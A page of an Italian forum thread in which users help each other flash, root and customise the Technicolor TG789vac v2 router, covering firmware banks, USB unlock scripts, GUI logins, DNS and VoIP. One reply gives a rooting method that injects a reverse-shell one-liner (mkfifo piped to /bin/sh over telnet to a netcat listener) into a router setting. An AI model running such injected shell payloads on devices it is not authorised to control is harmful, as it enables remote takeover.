[GUIDA] Flash, Root e Modding Technicolor TG789vac v2 (VANT-6)

• 4738 Risposte
  • 2436031 Visite

Offline FrancYescO

• VIP
  • 3382
Re:[GUIDA] TG789vac v2 iiNET/UNO Flash, Sblocco e Modding
« Risposta #1995 il: 10 Marzo 2019, 22:21 »
senza farti tanti problemi dalla card gateway puoi flashare il firmware... inviagli di nuovo uno e ti switchera' di bank, alla peggio devi rirootarlo

Offline LuKePicci

• Global Moderator
  • VIP
  • 2789
« Risposta #1996 il: 11 Marzo 2019, 00:33 »
PS. aggiungiamo il led segnalatore anche alla riga di Luke e siamo tutti piu felici :D

Fatto

@sorvolatore, hai capito benissimo

Offline larsen64it

• VIP
  • 2696
« Risposta #1997 il: 11 Marzo 2019, 08:24 »
Aggiornata pagina dello sblocco con o senza chiavetta.
Se ora non riuscite nello sblocco che Giove vi fulmini il router!!!

@ervius2
L'ip conta poco, dipende se il router a accesso diretto o meno ad internet. Lanciando parte dei comandi contenuti nello script di installazione rischi di incasinare il tutto.
« Ultima modifica: 11 Marzo 2019, 09:27 da larsen64it »

Offline sorvolatore

• Nuovo Iscritto
  • *
  • 25
« Risposta #1998 il: 11 Marzo 2019, 11:54 »
@LuKePicci
Io ho utilizzato quella stringa Chilometrica ed ha funzionato al secondo invio. Non ho più provato con la pennetta usb ed il tuo nuovo file.

@larsen64it
Non so come ringraziare se non aiutando altri in questo Forum.
Andrò avanti con l'nstallazione secondo i tuoi suggerimenti, sicuro che se qualcosa non va qui c'è tutto l'aiuto possibile.
Mai visto un forum così popolato e attivo....GRAZIE a tutti.

@FrancYescO
Per te aggiungo solo che ieri sera ho fatto come  mi hai suggerito.
L'operazione ha portato l'esito di avere il firm sul banco1 come da te ipotizzato.

Adesso procederò con i settaggi per Tiscali Fonia ecc ecc...
Questo Router sarà il BCK di quello Tiscali.
Con quello che me lo hanno fatto pagare dovrebbe essere compatibile con tutti i gestori in automatico insieme ad un caffè espresso di benvenuto...e meno male che adesso li costringono a dare i dati all'utente per il router free....almeno questo.
Si può dire ladri??
Aho...l'ho detto...scusate lo sfogo!!!

Offline ervius2

• Membro Giovane
  • **
  • 79
« Risposta #1999 il: 11 Marzo 2019, 20:36 »

@ervius2
L'ip conta poco, dipende se il router a accesso diretto o meno ad internet. Lanciando parte dei comandi contenuti nello script di installazione rischi di incasinare il tutto.

ok, il tuo: "accesso diretto" mi ha fatto pensare, ieri era solo collegato allo switch con inirizzo di rete nel range di casa mia, quindi 192,168.1.x,
srtasera ho configurato la WAN come "ethernet", e connessione come fixed IP (quindi ip:192.168.1.x, subnet nel range e gateway: 192.168.1.1), assegnando alla sua lan l'IP 192.168.5.1, assodato che ora era connesso in modo "diretto" ad internet, ho riprovato a reinstallare luci & company, e finalmente, funziona!!! , insomma, se nn fa il modem, non si installa nulla, se invece lo fa (e dice che è cnnesso ad internet al login), allora si comporta bene!
grazie della dritta!

Offline FrancYescO

• VIP
  • 3382
« Risposta #2000 il: 11 Marzo 2019, 20:50 »
Piu' che fare il modem deve avere connessione a internet... tutti i pacchetti necessari vengono scaricati e installati al momento

Offline ervius2

• Membro Giovane
  • **
  • 79
« Risposta #2001 il: 11 Marzo 2019, 20:53 »
Ieri anche lo era connesso, xché dalla sua wifi navigavo,  ma stranamente nn installlava nulla, e nn creava la cartella www_luci....
Vabbè, cmq se a qualcun altro capita, meglio usare la sua wan, sulla lan locale e diverso range ip/sottorete nella sua parte LAN ... a me ha funzionato!
« Ultima modifica: 11 Marzo 2019, 21:43 da ervius2 »

Offline sorvolatore

• Nuovo Iscritto
  • *
  • 25
« Risposta #2002 il: 11 Marzo 2019, 22:25 »
Ciao a tutti, qualcuno mi sa dire perchè quando monto la chiavetta sul modem e la cerco la trovo montata su /tmp/run/mountd/sda...invece che su /tmp/run/mountd/sda1??
Non riesco a portare a termine lo script anche cambiando il nome dentro sostituendo sda1 con sda....dovrei farlo su tutti i file anche quelli annidati....sapete dirmi come mai? mi è sembrato che ieri avevo una cartella sda1...
Ah...ho provato a montare a mano dove vorrei ma non mi fa creare cartelle dentro /tmp/run/mountd/ (accesso negato)

Offline Rizlas

• Nuovo Iscritto
  • *
  • 24
« Risposta #2003 il: 12 Marzo 2019, 00:44 »
Ciao a tutti,
con successo ho flashato firmware uno + gui Ansuel.
Mi servirebbero delle info:
 - Dopo aver messo gui Ansuel non ho più accesso tramite l'utente admin alla gui, ma solo da ssh con root e engineer, come posso aggiungere o resettare un utente per accedere alla gui?
 - FTP non è più disponibile come posso riattivarlo?
 - Nello specifico come tolgo il firmware tim dall'altra bank?  Non si capiscono molto bene le azioni da intraprendere dei precedenti post.

EDIT: ho riottenuto l'accesso con user admin e password admin. L'avevo cambiate dopo aver aggiornato il firmware, la gui cambia qualche parametro a riguardo?
EDIT2: ho trovato la sezione (Funzioni extra di sistema) per clonare il banco. Attualmente ho questa situazione https://imgur.com/MNkrKeN posso procedere col clona?

Aggiungo, c'è modo di non aver i DNS da parte dell'ISP? Ho visto che c'è modo di differenziare dns in lan e in wan ma non è possibile modificarli.

Volevo fare i complimenti ai ragazzi che hanno lavorato a questo progetto, veramente ben fatto e si può dire che il router così vale quasi i soldi spesi. Aggiungo una critica (spero ben accetta) riguardo alle istruzioni/tutorial/guide, sono veramente sparse in giro per tutto il forum e ho fatto fatica a reperire le informazioni spendendo un sacco di tempo a leggere vari post (cosa non male visto che si impara). Sarebbe l'ideale progettare una piccola wiki/FAQ su github, cosa ne pensate?
« Ultima modifica: 12 Marzo 2019, 11:13 da MisterFTTH »

Offline LuKePicci

• Global Moderator
  • VIP
  • 2789
« Risposta #2004 il: 12 Marzo 2019, 02:10 »
la trovo montata su /tmp/run/mountd/sda...invece che su /tmp/run/mountd/sda1

Dipende da come è scritta la tabella partizioni GPT/MBR della chiavetta. La mia (una delle) era montata come sda, poi dopo averla convertita in GPT/HFS per delle altre prove, l'ho ripristinata su MBR/FAT32 ed ha iniziato a montarsi come sda1. L'unico comando che devi cambiare è quello che inserisci da ssh, mi pare che nel file di sblocco.sh (almeno quello vecchio) non si facesse esplicito riferimento ad sda1, per cui non dovresti aver bisogno di modificarlo.

Offline larsen64it

• VIP
  • 2696
« Risposta #2005 il: 12 Marzo 2019, 07:16 »
Con supporti MBR/fat32-NTFS-ext3 non ho avuto mai problemi. Comunque tralasciando lo sblocco, cercate di capire come devono essere impostati i vostri supporti usb, perché se dovete condividere un disco pieno, scoccia dover travasare formattare e  travasare di nuovo. 

Offline sorvolatore

• Nuovo Iscritto
  • *
  • 25
« Risposta #2006 il: 12 Marzo 2019, 08:41 »
@LuKePicci
Infatti alla fine ho fatto così...
Sapete se per tiscali ancora vale il fatto che non devo avere indirizzi 94.xxx.xxx altrimenti non va il Telefono?
Ma che roba....veramente è così?
Guarda caso il loro modem da una settimana ha indirizzi di quella famiglia...te pareva. Ho visto un work around
nel forum che consiste, se non ho capito male, di chiedere al provider in continuazione di rinnovare indirizzo fino a che non ti viene assegnato quello della classe "Giusta"...corretto? è ancora così?

Offline abarth

• Membro Giovane
  • **
  • 69
« Risposta #2007 il: 12 Marzo 2019, 08:48 »
Nel file sharing non si naviga più per 2 motivi:
ok quindi è capitato anche a te consigli di limitare la banda a anche upload nn c avevo pensato per una 20MB  che valori metto DW/UP?
« Ultima modifica: 12 Marzo 2019, 11:12 da MisterFTTH »
Technicolor TIM TG789vac v2 bank1:Uno+sblocco+sharing / bank2:Uno+sblocco

Offline larsen64it

• VIP
  • 2696
« Risposta #2008 il: 12 Marzo 2019, 10:07 »
Per i dns

N.B. Vale il solito discorso senza dns del provider  il voip non funziona.
Installando la gui di default la paswd diventa admin: deve essere cambiata.
@abarth Quando usavo il p2p si parlava di K non di M. Considera che il router è acceso 25/24h limita la banda al 80-90% e caso mai aggiustala.

Per lo sblocco si può tornare anche all'uso di netcat:
1) Mettere sul pc netcat in ascolto: nc -lvvp 6666
2)  Login come engineer traminte ssh  IP -> 192.168.1.1 User -> engineer  Password -> ACCESS KEY stampata nell'etichetta sotto il router
3)  Copia/incolla ed esguire questo comando 
Codice: [Seleziona]
set [email protected] 'mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|telnet X.X.X.X 6666 >/tmp/f'4) Premete il pulsante laterale del modem
5) inserite la stringa di sblocco nella shell che appare su netcat  o digitate sh /tmp/run/mountd/sda1/sblocco.sh e date invio
« Ultima modifica: 12 Marzo 2019, 10:36 da larsen64it »

Offline Rizlas

• Nuovo Iscritto
  • *
  • 24
« Risposta #2009 il: 12 Marzo 2019, 11:12 »
Per i dns
N.B. Vale il solito discorso senza dns del provider  il voip non funziona.

Perfetto grazie, farò delle prove perchè usando nslookup non riesco a vedere se effettivamente sta usando quelli impostati. Inoltre c'è modo di aggiungere la risoluzione dei nomi per i dispositivi all'interno della lan?

Per il clone del clone del bank posso procedere tranquillamente (vedi foto post precedente)?

Dovendo impostare DDNS di http://www.duckdns.org/install.jsp posso seguire semplicemente le istruzioni date selezionando Routers->OpenWRT?